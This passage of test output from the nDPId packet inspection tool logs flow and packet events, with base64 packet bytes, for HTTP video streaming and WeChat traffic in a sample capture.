P2U9MTQyODk5OTY5OSZoPTgzZGEwNzg3NTkwYTdhNDUwMTYzYmJkN2E2Zjk3NGNhIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1429000049272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000049272,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeTkfkAAPwYGIQo2qfp4HCMoyycAUPhJNysVgOaYUBgDEEglAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDAxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000050062,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZkAAPwZ8rwo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -01938{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1429000051331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1152,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1152,"pkt_l4_len":1116,"thread_ts_msec":1429000051331,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBHAsp0AArAZOUHgcIygKNqn6AFDLJxWDzlj4STjnUBgIQ33VAAByqbIRKSnXO3n7wDbsfUk8e6VuWplgy2s+dhRInKblJDspkbYpMraIC2G\/R+GUD+2cHzU1WK917CgXy1UuWGNRG3nVdbmkpW6gXyTrK\/GWE44kpRkGnzPXCIHXPX744dGFJMegxO0qTCK1Fo6i3uEpacGLcKMMoyNpcaQHAYLI622xbJ8B36qbIZZWruxvDu7KIDG5e3mPu31z9S2QcHaVE4BE1tKVMaRT4CoWi1PkV85kYTw7+lXQj9CaQqhbKReGPL\/tcLMkyzZwE6IHJUK26PQvKyhEuU6GAQ+r9LcupqVlcd+NUyod+WhKMRAmSJil\/BRUsIdoudcrCIqRJzR5jVUoqyj\/ptMT5SVgA5N26bnxszCob1V6PGoSqrFbXGqUSFChkbSJKFRTCvxPDJYyRcjsMaoU12chr9o101HtsZqTm8Y5QbIAN7B8AVumqqy0fH9lTC67oIzCP4XCUFPOzmsTGixU55n8PiHFsO9k6FHgmL2Qpx9XZ7LZZq6kKLQZ6YEj4wSZ17X4PtdheB86DsQcq8hTQKwZ50xFXAuqOJAfjJ3Fwvpkhy0irBq+moIpZIUyDIXip19wI5TntRdQ6klOXxoMR4h+rkQF9NIWAZsF4N+T7NhEDH0IhJ+7C8yW\/XKrXV2QuHcZeah99tklt\/1RoCV3tlE3iI+9KsShs\/QYEoI2GuydlkjMnZTY8FZqf7NGoRzmtcyCTcSq7ihdZ8emY8+Em76YXV5DqpjEXAEAd6Ihi3wXtxe47OSDIzuYkFbw07vSe8r5pw+O8CvCFNmM+\/R5XtTzDC6jpCkjK2Ks4K8eO1sR7xVxwgkYKLOtWeJvnPFsHRpwPxtVG35fKrArPruPuT5oZOx\/pQJT9cFmcAl3RKKARXXxajyJ2qH50U92ABd9K3dq1HyFHG2aoh8ZR\/WT1vs31Bm0M7ATJhQL2l2m4hoGBonCWxZz758eNTp\/kC\/zRYgzH6m74xpGj038MxNX4to5jr+JtrVTP6loTNL8hf21+Z1vRJ8TKNwrI0CwNIptRF429nB7n+Pl6NrVJTHjMQt5IoQZRVlFDepGzD3fSDZZ4GjFo43mYzPMjWk0+FMIfnOvn6Gn8nXWwKtX1oF2fKKInSceON8GTZBwiFeJbBUg69aGCibPn5BkMxekscJXDNFdCB2xNetElbFYP+YoyUHk8ZsDR\/PLX1ywopxm9Q\/Py6arJrU3L+8wIopRGPUBVivuDfLh0pGSoWdpGKSTKIBICVrgSbSPdIgZjbfO0v4LLFX+kYV8QKziGFA\/WUp+nU5eMYE6UsEvLHeSktqvq0aUc+dVpxaKqVHlN+ect0oR9LY9MKkAeQsdVq1CuWDxS+xrJyD\/Uu+pp1IZey306exBm3ut4YWy7OXTRL0TOwdk6mtjCmzQzJRmtiRCxM7bjXgmi1lSWiwmYs4+DuYZWGKvtZHnnKOVsVmU8qj1T9ly"} -01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1429000051366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000051366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZ0AAPwZ8rgo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} -00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1429000052145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":145,"pkt_l4_len":109,"thread_ts_msec":1429000052145,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAIFK0UAArQZq68vNl6AKNqn6AFDWY3uzUB\/LAXbFUBgIIl2QAADLSVkFxdhO01jGkqqir\/4Pe\/qItPtTf6ajYud7yQvoMcf18CvkFV3iH59UBVcusMzzLrB7pfuUH4Sme9ekIxa0n3Xkcqj9Zb8GTsGgT4pSgGI1jIGtnmYZvw=="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000052217,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjSUAAPwaHVgo2qfp4HCMoyykAUHABsefLT2i4UBgBySAFAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIwLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} -01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":380,"pkt_l4_len":344,"thread_ts_msec":1429000052348,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWw6SUAAPwb+3wo2qfrLzYFlpwkAUDA+6IKRcovGUBgAblluAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1iYXRjaGVtb2ppZG93bmxvYWQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiA0OQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCoZfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwC5BQICxN0BAmqbBe97kd9DUUv3xZ4Sxtk="} -00840{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmbatchemojidownload","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01001{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":461,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":461,"pkt_l4_len":425,"thread_ts_msec":1429000052350,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAb2qTEAAPwZ4UAo2qfrLzZeg1mUAUE+SeI3XHwqaUBgAbsqdAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vZ2V0Y29udGFjdGxhYmVsbGlzdCBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDEzMA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNColfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwD\/BNABUsTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYeQoz6VrtJH00pu+gvbU58lmESj2o4D7TnERbmXXALCqM="} -00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1429000052688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000052688,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPWIBEAArAZEf8vNgWUKNqn6AFCnCZFyi8YwPunGUBgIIppgAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwC5BQwMAADES8+zVe2SBL6tUVxA2Vh6"} -00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1429000053611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000053611,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYEAArQar6MvNl6AKNqn6AFDWZdcfCppPknoiUBgIIrzYAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} -02362{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1429000054555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000054555,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaBrnEAArQYNK3gcIygKNqn6AFDLKctRyGZwAbOjUBAIIjnpAAC6eiaRjUv\/RPkOH82F5WosK669TTY41gIXUb5TM31DDCidAN9BA2XuM3HL8T4H8RaooiwzYVX\/NyYQvgJwozgBs+HWQERJo3j\/tFsg+NsbehQ2yqZ0ni5IF772nmOTUjjTqhvSyTYKL8LPX7\/SbJuUeesyVlCo1rcZrFyvobivL2QselZVKbZT9oXnVrTBXz9SgWOBGQjqM+6MYkHQqsKJwKvUzEiyfqsG7Y5ib\/HG3Cr61CWCOUzckjCo4x7\/2FXuS4bbTxyKoEXBeNcTCujBm4BW7TCl6yaZq2WXxGG4hvRF0Be\/m5kDX7D2ritov06P2eBHlozi8poVm+8iR+ps7ttJSDR9cRtIoZ6CzGQuMlpslQH3eGbKiA+TieQa5VKgPmn67A5ZHz6oVTfujJs8WKbjDDZ9Q0iRvNel4W1E1K\/\/zSVXoGcUMXf+jhnQwZpcpi1EdAnR+40BHozU+RTudhZL4Gple7Zf9xhKfQFyWOsUn76k3fkX1zxQlXwkMtX73RmtTyaB3L2pN7AlVM\/\/nWHu7EuLuT9DL9C5g0C9ndUmqL7NBsK0kAZZ78eDPfrNcCw\/ZFw2bNcbUFc\/DZYsLjg+otfm91LhV9Jp43mlKbIVnnDPmIDKMqjiCMwbTaSaZixrFny1uf5O00Y6dqEgtz9Pli4PyDpRhyoCvJu+i4H+d88Uaw2rkO46JoXyB7A5p5OjjhlkqrGyi1CwU0deobjNdyyDdV8jJ\/Pi9n3PsmZZgmuJXbUr3Wj33YeDG\/0Oj+2II0vRU4R2CMhv6eJcxCNdiNxlxN6WMj7SN4Xwx9cQTGloH0v9P+ZbhisAixQQx+c7VnS53a6eMHAGjtfp5Vfl\/a+fbz\/SS6+0wsbw43YigcJZdKwu\/J+7R2Vsvwwp\/\/0VJXCclXCvQKK9ZgSyMjcZXFFdVBYQ9ynX2PKUJbCiQo0ZSacbctiB0eo38ldIKG1HQXiG+IvrS8x51f+MHkxe\/Qz6gFVONzxqGI2AuPK799Gz1u48EzIlwqf+hfJ5+80+67LPm7OKnX\/+Hglw20t2bXScSU\/7a\/No7LXMZaiPPFjItOLkydDIZdblKbD9VzRcriDGIikYRE2vOO7ef0bABx9ekxq7Y6qOz8wz2bfi82kKdO6ZKos8mJ6Z5zMskbhz5TARjuFwb\/y0CNvNRI3ZzaCcWvcSerQm6YI5Qkh9hi+UFoCigmvOa40ltrSAgZJLwEzoigbbL\/Fux90aNws71lhYIk5rLapLHllGTYci4NeZq+lysN0NJeGSVgJjhywSjEcv98KS01SOoGP+L8hkrHHDndozayAIZx7KNatPdBhHierZx9hk7YaR2QyAaOf\/KGZ26mtXJD+fZ9qzzRf7VPOJIXRan6Mvh2X5ksvc+d2E+xpW4ZS3heqwr3GFyseSzu+SItPTkyOePTh5SBKlnurq4GBXzKzTiVp1gCObUjjb361kLXFDG8pv8RFHz9T71D1Nc2wSTzFugnvV1UNFiSfCUv5Hf3vreasQSxEc5M2HufON7Ls2Sq1av0HxiKW3cr3g1hTf6isQpBvLi2kzfVTuUfjZ4NfuituEBPk76dM0NGhwCE37DhDWyEA0CskC\/3LGpzpkwJVXZJneb4tZ6ZUUp9Tq8jwnKJrc9Xm0\/K+NOqhD9cfXeA0wPmIBqb\/50HOtK0ivaxJQrriFNfYzXGvwDWExqj3032B+UnoRZ9sdl+HDci1tJl2ZYTWQ\/jnW4QU+eyZsftpA1fidaKNXFUm98r6LCSgwEpKQko1ga3+vGDjVtQbFJqqZZSUhMiGE7JxSiWQR6m1VFOyrIP\/NGSlhQwEVU0AVlSc0flRUDOO1ef3Q8CCp+aj8TUh3wwIIfQUflA=="} 